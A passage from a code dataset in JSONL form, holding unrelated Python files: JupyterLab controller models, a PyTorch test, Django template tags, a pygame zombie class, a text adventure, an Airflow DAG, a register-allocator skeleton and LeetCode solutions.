and non-ASCII characters.\"\n \" Should be the user's preferred representation of their name to\"\n \" other humans.\"\n ),\n )\n uid: int = Field(\n ...,\n examples=[1104],\n title=\"Numeric UID for user (POSIX)\",\n description=\"32-bit unsigned integer\",\n )\n gid: int = Field(\n ...,\n examples=[1104],\n title=\"Numeric GID for user's primary group (POSIX)\",\n description=\"32-bit unsigned integer\",\n )\n groups: list[UserGroup] = Field([], title=\"User's group memberships\")\n\n @classmethod\n def from_gafaelfawr(cls, user: GafaelfawrUserInfo) -> Self:\n \"\"\"Convert Gafaelfawr's user metadata model to this model.\n\n Parameters\n ----------\n user\n Gafaelfawr user metadata.\n\n Returns\n -------\n UserInfo\n User information stored as part of the lab state.\n \"\"\"\n return cls(\n username=user.username,\n name=user.name,\n uid=user.uid,\n gid=user.gid,\n groups=[g for g in user.groups if g.id],\n )\n\n\nclass ResourceQuantity(BaseModel):\n cpu: float = Field(\n ...,\n examples=[1.5],\n title=\"Kubernetes CPU resource quantity\",\n description=(\n \"cf. \"\n \"https://kubernetes.io/docs/tasks/\"\n \"configure-pod-container/assign-cpu-resource/\"\n ),\n )\n memory: int = Field(\n ...,\n examples=[1073741824],\n title=\"Kubernetes memory resource in bytes\",\n )\n\n\nclass LabResources(BaseModel):\n limits: ResourceQuantity = Field(..., title=\"Maximum allowed resources\")\n requests: ResourceQuantity = Field(\n ..., title=\"Intially-requested resources\"\n )\n\n def to_kubernetes(self) -> V1ResourceRequirements:\n \"\"\"Convert to the Kubernetes object representation.\"\"\"\n return V1ResourceRequirements(\n limits={\n \"cpu\": str(self.limits.cpu),\n \"memory\": str(self.limits.memory),\n },\n requests={\n \"cpu\": str(self.requests.cpu),\n \"memory\": str(self.requests.memory),\n },\n )\n\n\nclass UserLabState(LabSpecification):\n \"\"\"Current state of the user's lab.\"\"\"\n\n user: UserInfo = Field(..., title=\"User who owns the lab\")\n status: LabStatus = Field(\n ..., examples=[\"running\"], title=\"Status of user container\"\n )\n pod: PodState = Field(..., examples=[\"present\"], title=\"User pod state\")\n internal_url: str | None = Field(\n None,\n examples=[\"http://nublado-ribbon.nb-ribbon:8888\"],\n title=\"URL by which the Hub can access the user Pod\",\n )\n resources: LabResources = Field(..., title=\"Resource limits and requests\")\n quota: ResourceQuantity | None = Field(\n None, title=\"Quota for all user resources\"\n )\n\n @classmethod\n def from_request(\n cls,\n user: GafaelfawrUserInfo,\n lab: LabSpecification,\n resources: LabResources,\n ) -> Self:\n \"\"\"Create state for a new lab that is about to be spawned.\n\n Parameters\n ----------\n user\n Owner of the lab.\n lab\n Lab specification from JupyterHub.\n resources\n Resource limits and requests for the lab (normally derived from\n the lab size).\n\n Returns\n -------\n UserLabState\n New user lab state representing a lab that's about to be spawned.\n \"\"\"\n quota = None\n if user.quota and user.quota.notebook:\n quota = ResourceQuantity(\n cpu=user.quota.notebook.cpu,\n memory=int(user.quota.notebook.memory * 1024 * 1024 * 1024),\n )\n return cls(\n user=UserInfo.from_gafaelfawr(user),\n options=lab.options,\n env=lab.env,\n status=LabStatus.PENDING,\n pod=PodState.MISSING,\n resources=resources,\n quota=quota,\n )\n","repo_name":"lsst-sqre/jupyterlab-controller","sub_path":"src/jupyterlabcontroller/models/v1/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7473165706","text":"# Owner(s): [\"module: functorch\"]\nimport unittest\n\nimport torch\nimport torch._dynamo\nimport torch._export\nfrom torch._higher_order_ops.out_dtype import out_dtype\nfrom torch.fx.experimental.proxy_tensor import make_fx\nfrom torch.testing._internal.common_utils import run_tests, TestCase\nfrom torch.testing import FileCheck\n\n\n@unittest.skipIf(not torch._dynamo.is_dynamo_supported(), \"dynamo isn't support\")\nclass TestOutDtypeOp(TestCase):\n def test_out_dtype_make_fx(self):\n class M(torch.nn.Module):\n def __init__(self, weight):\n super().__init__()\n self.weight = weight\n\n def forward(self, x):\n return out_dtype(\n torch.ops.aten.mm.default, torch.int32, x, self.weight\n )\n\n weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n m = M(weight)\n x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n\n gm = make_fx(m)(x)\n self.assertTrue(torch.allclose(m(x), gm(x)))\n\n gm = make_fx(torch.func.functionalize(M(weight)))(x)\n self.assertTrue(torch.allclose(m(x), gm(x)))\n\n FileCheck().check(\"torch.ops.higher_order.out_dtype\").check(\"aten.mm.default\").run(gm.code)\n self.assertTrue(torch.allclose(m(x), gm(x)))\n for node in gm.graph.nodes:\n if node.op == \"call_function\" and node.target is out_dtype:\n # Result of this node should be int32\n self.assertTrue(node.meta[\"val\"].dtype, torch.int32)\n # Argument of this node should be int8\n self.assertTrue(node.args[2].meta[\"val\"].dtype, torch.int8)\n\n def test_out_dtype_op_functional(self):\n class M(torch.nn.Module):\n def __init__(self, weight):\n super().__init__()\n self.weight = weight\n\n def forward(self, x):\n return out_dtype(\n torch.ops.aten.mm.default, torch.int32, x, self.weight\n )\n\n weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n m = M(weight)\n x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n ep = torch._export.export(\n m,\n (x,),\n )\n FileCheck().check(\"torch.ops.higher_order.out_dtype\").check(\"aten.mm.default\").run(ep.graph_module.code)\n self.assertTrue(torch.allclose(m(x), ep(x)))\n for node in ep.graph.nodes:\n if node.op == \"call_function\" and node.target is out_dtype:\n # Result of this node should be int32\n self.assertTrue(node.meta[\"val\"].dtype, torch.int32)\n # Argument of this node should be int8\n self.assertTrue(node.args[2].meta[\"val\"].dtype, torch.int8)\n\n def test_out_dtype_mm_numerical(self):\n class M(torch.nn.Module):\n def __init__(self, weight):\n super().__init__()\n self.weight = weight\n\n def forward(self, x):\n return out_dtype(\n torch.ops.aten.mm.default, torch.int32, x, self.weight\n )\n\n weight = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n m = M(weight)\n x = torch.randint(-128, 127, (5, 5), dtype=torch.int8)\n\n gm = make_fx(m)(x)\n\n x_casted = x.to(torch.int32)\n weight_casted = weight.to(torch.int32)\n numerical_res = torch.ops.aten.mm.default(x_casted, weight_casted)\n self.assertTrue(torch.allclose(numerical_res, gm(x)))\n\n def test_out_dtype_dynamo(self):\n def f(x, y):\n return out_dtype(\n torch.ops.aten.mul.Scalar, torch.int32, x, y\n )\n\n inp = (torch.randint(-128, 127, (5, 5), dtype=torch.int8), 3.0)\n\n compiled = torch.compile(f, backend=\"eager\", fullgraph=True)\n self.assertTrue(torch.allclose(f(*inp), compiled(*inp)))\n\n def test_out_dtype_mul_scalar_numerical(self):\n def f(x, y):\n return out_dtype(\n torch.ops.aten.mul.Scalar, torch.int32, x, y\n )\n\n inp = (torch.randint(-128, 127, (5, 5), dtype=torch.int8), 3.0)\n\n gm = make_fx(f)(*inp)\n numerical_res = torch.ops.aten.mul.Scalar(inp[0].to(dtype=torch.int32), 3)\n self.assertTrue(torch.allclose(numerical_res, gm(*inp)))\n\n def test_out_dtype_non_functional(self):\n def f(x, y):\n return out_dtype(\n torch.ops.aten.add_.Tensor, torch.int32, x, y\n )\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's first argument needs to be a functional operator\"):\n _ = torch._export.export(\n f, (torch.randint(-128, 127, (5, 5), dtype=torch.int8), torch.randint(-128, 127, (5, 5), dtype=torch.int8)),\n )\n\n def test_out_dtype_non_op_overload(self):\n def f(x, y):\n return out_dtype(\n torch.add, torch.int32, x, y\n )\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's first argument must be an OpOverload\"):\n f(torch.randint(-128, 127, (5, 5), dtype=torch.int8), torch.randint(-128, 127, (5, 5), dtype=torch.int8))\n\n def test_out_dtype_no_autograd(self):\n def f(x, y):\n return out_dtype(\n torch.ops.aten.mm.default, torch.int32, x, y\n )\n\n inp = (torch.randn(5, 5, requires_grad=True), torch.randn(5, 5, requires_grad=True))\n # error is delayed\n f(*inp)\n\n with torch.no_grad():\n f(*inp)\n\n with self.assertRaisesRegex(RuntimeError, \"does not require grad and does not have a grad_fn\"):\n out = f(*inp)\n loss = out - torch.ones(out.shape)\n loss.backward()\n\n def test_out_dtype_wrong_output(self) -> None:\n def multiple_out(x):\n return out_dtype(\n torch.ops.aten.topk.default, torch.int32, x, 5\n )\n\n inp = (torch.randn(10),)\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's can only apply to ops that return a single tensor\"):\n multiple_out(*inp)\n\n def singleton_list_out(x):\n return out_dtype(\n torch.ops.aten.split_copy.Tensor, torch.int32, x, 10\n )\n\n with self.assertRaisesRegex(ValueError, \"out_dtype's can only apply to ops that return a single tensor\"):\n singleton_list_out(*inp)\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"ashen-sensored/pytorch","sub_path":"test/test_out_dtype_op.py","file_name":"test_out_dtype_op.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10594681989","text":"from django import template\nfrom django.conf import settings\nregister = template.Library()\n\ndef twittercard_summary(context, *args, **kwargs):\n card = get_twittercard_attributes(kwargs)\n card['card'] = 'summary'\n request = context['request']\n card['url'] = kwargs.get('url', request.build_absolute_uri())\n return card\nregister.inclusion_tag('twittercard/summary.html', takes_context=True)(twittercard_summary)\n\ndef twittercard_photo(context, *args, **kwargs):\n card = get_twittercard_attributes(kwargs)\n card['card'] = 'photo'\n card['image_width'] = kwargs.get('image_width', None)\n card['image_height'] = kwargs.get('image_height', None)\n return card\nregister.inclusion_tag('twittercard/photo.html', takes_context=True)(twittercard_photo)\n\ndef get_twittercard_attributes(kwargs):\n card = {}\n card['title'] = kwargs.get('title', None)\n card['description'] = kwargs.get('description', None)\n card['image'] = kwargs.get('image', None)\n config = getattr(settings, 'TWITTERCARD_CONFIG', None)\n if config is not None:\n card['site'] = kwargs.get('site', config.get('SITE', None))\n card['site_id'] = kwargs.get('site_id', config.get('SITE_ID', None))\n card['creator'] = kwargs.get('creator', config.get('CREATOR', None))\n card['creator_id'] = kwargs.get('creator_id', config.get('CREATOR_ID', None))\n return card\n","repo_name":"leveille/django-twittercard","sub_path":"twittercard/templatetags/twittercard.py","file_name":"twittercard.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"40098892467","text":"import random\n\nimport pygame\nfrom pygame.locals import *\n\nimport config as c\nfrom misc import get_images_from_sprite_sheet, lcm, transform_image\nfrom sprites import Sprite\n\n\nclass Zombie(Sprite):\n \"\"\"\n Complex base class for zombies\n \"\"\"\n # Animation speed\n animation_frame = c.fps / 10\n counter = 0\n # Characteristics\n health = 200\n speed = 0.23\n damage = 100\n reload = c.fps\n\n groan = 9 * c.fps\n\n def __init__(self, row, images, size=None):\n super().__init__(\n c.sizes[\"win\"][0], # Right after the screen edge\n c.pads[\"game\"][1] + (row - 3 / 4) * c.sizes[\"cell\"][1],\n image=next(images), size=size\n )\n # --------------Animation--------------\n # Burn animation\n self.ignited, _ = get_images_from_sprite_sheet(\"assets/zombies/incinerated.png\",\n 6, 5, size=c.sizes[\"zombie\"])\n self.incinerated = False\n # Infinite iterator with images\n # So image update can be easily called with next() func\n self.images = images\n # Real x pos, while rect x is floored\n self.x = self.rect.x\n # Target enemy plant\n self.eating = pygame.sprite.GroupSingle()\n # Freeze chars - makes walking and attacking slower\n self.frozen = False\n self.frozen_reload = self.reload * 2\n self.frozen_speed = self.speed / 2\n # After being shot makes nex image lighter\n self.shot = False\n # Game position\n self.col = c.XCells + 1\n self.row = row\n # --------------Sounds--------------\n self.chomps = (\n pygame.mixer.Sound(\"assets/audio/chomp.wav\"),\n pygame.mixer.Sound(\"assets/audio/chomp2.wav\"),\n pygame.mixer.Sound(\"assets/audio/chompsoft.wav\")\n )\n self.groans = (\n pygame.mixer.Sound(\"assets/audio/groan.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan2.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan3.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan4.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan5.wav\"),\n pygame.mixer.Sound(\"assets/audio/groan6.wav\"),\n )\n self.frozen_sound = pygame.mixer.Sound(\"assets/audio/frozen.wav\")\n self.frozen_sound.set_volume(0.6)\n random.choice(self.groans).play()\n\n def update(self, screen):\n \"\"\"\n Called every tick\n Updates zombie\n\n Either makes zombie go or attack\n Regarding freeze caused py SnowPea's\n Which makes everything slower\n :param screen: pygame.display\n :return: None\n \"\"\"\n # Placed separately not to over complicate if/else statements\n if self.incinerated:\n self.incinerated -= 1\n if self.incinerated % self.animation_frame == 0:\n self.image = next(self.ignited)\n self._draw(screen)\n if self.incinerated == 0:\n self.kill()\n return\n\n self.counter += 1\n # Walk animation\n # Or damage infliction\n if self.counter % self.animation_frame == 0:\n self.image = next(self.images)\n # If zombie is frozen makes its image blue\n if self.frozen:\n self.frozen -= 1\n self.image = transform_image(self.image, r=0, g=0, b=128, alpha=5,\n special_flag=BLEND_RGBA_ADD)\n # If zombie is hit makes it lighter\n if self.shot:\n self.shot = False\n self.image = transform_image(self.image,\n r=64, g=64, b=64, alpha=5,\n special_flag=BLEND_RGBA_ADD)\n if not self.busy(): # If zombie is not eating\n # Movement\n if not self.frozen:\n self.x -= self.speed\n else:\n self.x -= self.frozen_speed\n self.rect.x = int(self.x) + 1\n # Using flooring because pygame rect doesn't support not-int coordinates\n else:\n # Damage infliction\n if (not self.frozen and self.counter % self.reload == 0) or \\\n (self.counter % self.frozen_reload == 0):\n random.choice(self.chomps).play()\n self.deal_damage()\n\n if self.counter % self.groan == 0:\n random.choice(self.groans).play()\n\n self.counter %= lcm(self.reload, self.animation_frame, self.groan)\n # Update cell on the game field\n self.col = int((self.rect.x - c.pads[\"game\"][0] + c.sizes[\"cell\"][0] / 2)\n // c.sizes[\"cell\"][0])\n self._draw(screen)\n\n def take_damage(self, bullet):\n \"\"\"\n Takes damage from bullet and removes it\n Also makes self image blue if projectile.__class__ == SnowProjectile\n :param bullet: Projectile\n :return: None\n \"\"\"\n bullet.deal_damage(self)\n self.check_alive()\n bullet.kill()\n\n if bullet.__class__.__name__ == \"SnowProjectile\":\n self.frozen = bullet.freeze_time\n # Freezes zombie\n self.image = transform_image(self.image, r=0, g=0, b=128, alpha=5,\n special_flag=BLEND_RGBA_ADD)\n self.frozen_sound.play()\n\n self.shot = True\n\n def busy(self) -> bool:\n \"\"\"\n Checks if zombie is eating anything\n :return: bool\n \"\"\"\n return bool(len(self.eating))\n\n def coords(self) -> tuple:\n \"\"\"\n Returns coordinates on the game field\n :return: (row, col)\n \"\"\"\n return self.row, self.col\n\n def change_target(self, enemy):\n \"\"\"\n Changes eating target on the given one\n :param enemy: Plant\n :return: None\n \"\"\"\n self.eating.add(enemy)\n\n def check_alive(self):\n \"\"\"\n Kills itself if health below or equals zero\n :return: None\n \"\"\"\n if self.health <= 0:\n self.kill()\n\n def deal_damage(self):\n \"\"\"\n Lowers target plant health\n :return: None\n \"\"\"\n self.eating.sprite.take_damage(self.damage)\n\n def ignite(self):\n \"\"\"\n Plays ignite animation and dies after\n Needed as kill animation for CherryBomb\n :return: None\n \"\"\"\n self.incinerated = self.animation_frame * 30\n","repo_name":"yeya24/PvZc","sub_path":"zombies/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31014122251","text":"import random\nfrom threading import Lock\n\nfrom tools import get_direction, plural_days\n\n\nclass SingletonMeta(type):\n _instances = {}\n _lock: Lock = Lock()\n\n def __call__(cls, *args, **kwargs):\n with cls._lock:\n if cls not in cls._instances or args or kwargs:\n instance = super().__call__(*args, **kwargs)\n cls._instances[cls] = instance\n return cls._instances[cls]\n\n\nclass Adventure(metaclass=SingletonMeta):\n def __init__(self, width=4, height=4, step_counter=False):\n self.world = None\n self.final_position = None\n self.current_position = None\n self.width = width\n self.height = height\n self.generate_game()\n self.is_step_counter_on = step_counter\n self.step_count = 0\n self.is_finished = False\n\n # Генерация мира, финальной и стартовой комнат\n def generate_game(self):\n current_position = [random.randint(1, self.height), random.randint(1, self.width)]\n finish_position = [random.randint(1, self.height), random.randint(1, self.width)]\n while current_position == finish_position:\n finish_position = [random.randint(1, self.height), random.randint(1, self.width)]\n\n total = []\n for x in range(1, self.height + 1):\n line = []\n for y in range(1, self.width + 1):\n di = {f\"Комната {x}-{y}\": [x, y]}\n line.append(di)\n total.append(line)\n\n self.current_position = current_position\n self.final_position = finish_position\n self.world = total\n\n # Совершение \"шага\": проверка его возможности, определение завершения игры и вывода соответствующих сообщений\n def make_step(self, steps, way):\n is_success = False\n alert_type = \"warning\"\n\n if way == 1:\n if self.current_position[0] - steps >= 1:\n self.current_position[0] -= steps\n is_success = True\n elif way == 2:\n if self.current_position[1] + steps <= self.width:\n self.current_position[1] += steps\n is_success = True\n elif way == 3:\n if self.current_position[0] + steps <= self.height:\n self.current_position[0] += steps\n is_success = True\n elif way == 4:\n if self.current_position[1] - steps >= 1:\n self.current_position[1] -= steps\n is_success = True\n\n if is_success:\n\n if self.is_step_counter_on:\n self.step_count += 1\n\n if self.check_win():\n alert_type = \"success\"\n return \"Вы успешно добрались до цели, поздравляю!\\nИгра окончена: можете переиграть её заново, \" \\\n \"или создать мир другого размера, вернувшись на главную.\", alert_type\n else:\n return f'Вы сделали {plural_days(steps, \"steps\", False)} на {get_direction(way)}. ' \\\n f'Сейчас вы в комнате {self.current_position[0]}-{self.current_position[1]}', alert_type\n else:\n alert_type = \"danger\"\n return \"Вы не можете сделать этот шаг\", alert_type\n\n # Проверка, завершилась ли игра или нет\n def check_win(self):\n if self.current_position == self.final_position:\n self.is_finished = True\n return self.is_finished\n","repo_name":"zak427zak/strange-adventure-game","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19688065589","text":"from setuptools import find_packages, setup\n\nfrom pyclier import __author__, __name__, __version__\n\n\ndef read_requirements():\n reqs = []\n with open(\"requirements.txt\", \"r\") as f:\n for line in f:\n reqs.append(line.strip())\n return reqs\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=__name__,\n version=__version__,\n author=__author__,\n description=\"A python CLI framework base on argparse, supporting: config system, command-completion, rich-text log and so on.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/zhangxianbing/pyclier\",\n packages=find_packages(include=[f\"{__name__}*\"]),\n install_requires=read_requirements(),\n python_requires=\">=3.6\",\n license=\"Apache License 2.0\",\n keywords=\"options, argparse, config, cli, YAML, INI\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n ],\n)\n","repo_name":"zhangxianbing/pyclier","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9881129857","text":"from airflow import DAG\nfrom airflow.providers.cncf.kubernetes.operators.kubernetes_pod import (\n KubernetesPodOperator,\n)\nfrom pendulum import datetime\n\ndefault_args = {\n \"start_date\": datetime(2023, 10, 1),\n}\n\nwith DAG(dag_id=\"example_kubernetes_pod\", schedule=\"@daily\", default_args=default_args) as dag:\n KubernetesPodOperator(\n image=\"asset-materialization-image:latest\",\n cmds=[\"python\", \"create_asset.py\", \"--execution-date\", \"{{ ds }}\"],\n name=\"asset-materialization-pod\",\n task_id=\"asset-materialization-task\",\n in_cluster=False,\n cluster_context=\"kind-kind\",\n config_file=\"/opt/airflow/.kube/config\",\n is_delete_operator_pod=True,\n get_logs=True,\n # If xcom_push is True, the content of the file /airflow/xcom/return.json in the container\n # will also be pushed to an XCom when the container completes.\n xcom_push=True,\n )\n","repo_name":"dagster-io/dagster","sub_path":"examples/experimental/external_assets/airflow_example.py","file_name":"airflow_example.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"72070908007","text":"# 请根据每日 气温 列表 temperatures ,重新生成一个列表,要求其对应位置的输出为:要想观测到更高的气温,至少需要等待的天数。如果气温在这之后都不\n# 会升高,请在该位置用 0 来代替。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入: temperatures = [73,74,75,71,69,72,76,73]\n# 输出: [1,1,4,2,1,1,0,0]\n# \n# \n# 示例 2: \n# \n# \n# 输入: temperatures = [30,40,50,60]\n# 输出: [1,1,1,0]\n# \n# \n# 示例 3: \n# \n# \n# 输入: temperatures = [30,60,90]\n# 输出: [1,1,0] \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= temperatures.length <= 10⁵ \n# 30 <= temperatures[i] <= 100 \n# \n# \n# \n# \n# 注意:本题与主站 739 题相同: https://leetcode-cn.com/problems/daily-temperatures/ \n# Related Topics 栈 数组 单调栈 👍 26 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n # def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # \"\"\"\n # 方法1:暴力遍历; 能解,但会超时;\n # :param temperatures:\n # :return:\n # \"\"\"\n # res = []\n # for i, t in enumerate(temperatures):\n # for j in range(i, len(temperatures)):\n # if temperatures[j] > t:\n # res.append(j - i)\n # break\n # elif j == len(temperatures) - 1:\n # res.append(0)\n # break\n # return res\n\n # def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n # \"\"\"\n # 方法2:单调栈。此题实际上是找每个数右边第一个比它大的数,即单调栈问题。\n # :param temperatures:\n # :return:\n # \"\"\"\n # ret = [0 for _ in range(len(temperatures))]\n # # 栈中存放数组下标,栈中下标表示的温度按照降序排列。当温度大于栈顶温度时,即出栈。\n # stack = []\n # for idx, t in enumerate(temperatures):\n # # 栈为空或者栈顶温度小于当前温度时,计算栈顶与当前日期的时间差,把栈顶弹出;\n # while stack and temperatures[stack[-1]] < t:\n # ret[stack[-1]] = idx - stack[-1]\n # stack.pop()\n # # 把当前温度的日期入栈。\n # stack.append(idx)\n # return ret\n\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n \"\"\"\n 方法3:单调栈。倒着遍历。\n \"\"\"\n n = len(temperatures)\n res = [0 for _ in range(n)]\n\n stack = []\n for i in range(n-1, -1, -1):\n while stack and temperatures[stack[-1]] <= temperatures[i]:\n stack.pop()\n\n if stack:\n res[i] = stack[-1] - i\n stack.append(i)\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n temperatures = [73, 74, 75, 71, 69, 72, 76, 73]\n result = Solution().dailyTemperatures(temperatures)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 038]每日温度.py","file_name":"[剑指 Offer II 038]每日温度.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12569790235","text":"from codegen.liveness import liveness_analysis\nfrom codegen.instr import LABEL as L, MOVE as M, OPER as O\nfrom ir.nodes import Temp\n\nclass Spill(Exception):\n\n def __init__(self, temp):\n super().__init__(\"Temporary {} requires spilling\".format(temp))\n self.temp = temp\n\ndef colorize(frame, instrs):\n \"\"\"Return a map of registers allocation or fail with a Spill exception if\n a color cannot be allocated for a register.\"\"\"\n interferences, coalesces = liveness_analysis(frame, instrs)\n # List of mappings after register allocation or coalescing\n remapped = {}\n # Number of registers\n k = len(frame.registers)\n # Stack of registers to later color when unstacking\n stack = []\n # Temporaries not stacked yet\n temporaries = set(interferences.keys()).difference(frame.registers)\n\n def canon(reg):\n \"\"\"Find the canonical representation of a register in the remapping table.\n Mappings are updated to the final destination while the call chain gets rewound.\"\"\"\n target = remapped.get(reg)\n if target:\n final = canon(target)\n if final != target:\n remapped[reg] = final\n return final\n return reg\n\n def mark_coalesced(a, b):\n \"\"\"Coalesce a and b. Physical registers are always selected as the target. If one of them\n is a physical register, it will always be the target of the remapping. The interferences\n entry for a will be merged into the one of b then removed, same for the coalesces entries.\n Also, a will be removed from the temporaries as it has been taken care of.\"\"\"\n a, b = canon(a), canon(b)\n if a in frame.registers:\n assert b not in frame.registers, \"cannot coalesce physical registers {} and {}\".format(a, b)\n a, b = b, a\n remapped[a] = b\n raise NotImplementedError(\"marking registers as coalesced\")\n\n def push_to_stack(t):\n \"\"\"Push a temporary and its interferences to the stack, and clear its\n interferences in the live tree. Also remove it from the temporaries list.\n Pushing the interferences of the temporary along with it allows to easily\n determine an available color when unstacking.\"\"\"\n raise NotImplementedError(\"push to stack\")\n\n def simplify():\n \"\"\"Push one temporary of insignificant degree not involved in a MOVE operation\n to the stack and return it. It gets removed from the temporaries list. If none is\n found, return None.\"\"\"\n raise NotImplementedError(\"simplify\")\n\n def coalesce():\n \"\"\"Coalesce two temporaries involved in a MOVE operation so that they do not\n prevent the new node from being simplified. Return the pair that has been coalesced\n or None otherwise.\"\"\"\n raise NotImplementedError(\"coalesce\")\n\n def spill_candidate():\n \"\"\"Find a spill candidate with the best score. We do not take loops into account.\"\"\"\n raise NotImplementedError(\"spill candidate\")\n\n def unstack():\n \"\"\"Pop and color temporaries from the stack. If a temporary cannot\n get a color that none of his neighbour has, we need to spill it. A Spill\n exception will be raised to indicate that spilling needs to occur and\n the whole process must be started again. The parameter of the exception\n will indicate the register that needs spilling\"\"\"\n raise NotImplementedError(\"unstack\")\n\n def apply_mappings():\n \"\"\"Apply register mappings and return a list of instructions with\n only physical registers. Redundant move operations and non-jumped-to\n labels will be removed to. The stack size for the function is now\n known and the appropriate label will be replaced by a stack\n allocation. The cleaned up list of instructions will be returned.\"\"\"\n raise NotImplementedError(\"apply mappings\")\n\n while temporaries:\n simplified_or_coalesced = False\n\n # Simplify as much as possible\n while True:\n n = simplify()\n if n:\n simplified_or_coalesced = True\n else:\n break\n\n # Coalesce as much as possible\n while True:\n p = coalesce()\n if p:\n simplified_or_coalesced = True\n else:\n break\n\n # We went a full round without simplification or coalescing.\n # If possible, we will break a coalescing bound, otherwise,\n # we will have to spill a potential candidate. Hopefully,\n # when unstacking, several neighbours will have the same color\n # and we will not have to really spill it.\n if not simplified_or_coalesced:\n candidates = temporaries.intersection(coalesces.keys())\n if candidates:\n weights = dict((node, len(interferences[node])) for node in candidates)\n to_remove = min(weights.keys(), key=lambda n: weights[n])\n for n in coalesces[to_remove]:\n coalesces[n].remove(to_remove)\n del coalesces[to_remove]\n else:\n potential_spill = spill_candidate()\n push_to_stack(potential_spill)\n\n # Unstack and color the temporaries with physical registers.\n unstack()\n\n # So far so good, apply mappings and return.\n return apply_mappings()\n\ndef allocate_registers(frame, instrs):\n \"\"\"Allocate registers for the given instructions. If we get a\n Spill exception from colorize, we need to spill the given\n temporary and start over.\"\"\"\n while True:\n try:\n return colorize(frame, instrs)\n except Spill as spill_exception:\n instrs = spill_temporary(frame, instrs, spill_exception.temp)\n\ndef spill_temporary(frame, instrs, spill):\n \"\"\"Spill a temporary, reload it before every use through a new temporary,\n save it after every def through a new temporary. Those temporary will\n replace the spilled temporary in the original instructions, so that\n the new lifetimes are kept very short.\"\"\"\n # Allocate a new spill space in the frame\n saved_offset = frame.alloc_spill()\n raise NotImplementedError(\"spill temporary for {}\".format(spill))\n","repo_name":"ErwanCheriaux/SE202","sub_path":"codegen/alloc.py","file_name":"alloc.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36134989164","text":"\"\"\"\nGiven an n x n binary matrix image, flip the image horizontally, then invert it, and return the resulting image.\n\nTo flip an image horizontally means that each row of the image is reversed.\n\nFor example, flipping [1,1,0] horizontally results in [0,1,1].\nTo invert an image means that each 0 is replaced by 1, and each 1 is replaced by 0.\n\nFor example, inverting [0,1,1] results in [1,0,0].\n \n\nExample 1:\n\nInput: image = [[1,1,0],[1,0,1],[0,0,0]]\nOutput: [[1,0,0],[0,1,0],[1,1,1]]\nExplanation: First reverse each row: [[0,1,1],[1,0,1],[0,0,0]].\nThen, invert the image: [[1,0,0],[0,1,0],[1,1,1]]\nExample 2:\n\nInput: image = [[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]\nOutput: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]\nExplanation: First reverse each row: [[0,0,1,1],[1,0,0,1],[1,1,1,0],[0,1,0,1]].\nThen invert the image: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]\n\"\"\"\n\nclass Solution(object):\n def flipAndInvertImage(self, image):\n \"\"\"\n :type image: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n for i in image:\n i = i[::-1]\n for j, v in enumerate(i):\n if v == 1:\n i[j] = 0\n else:\n i[j] = 1\n res.append(i)\n\n return res\n\nsolution = 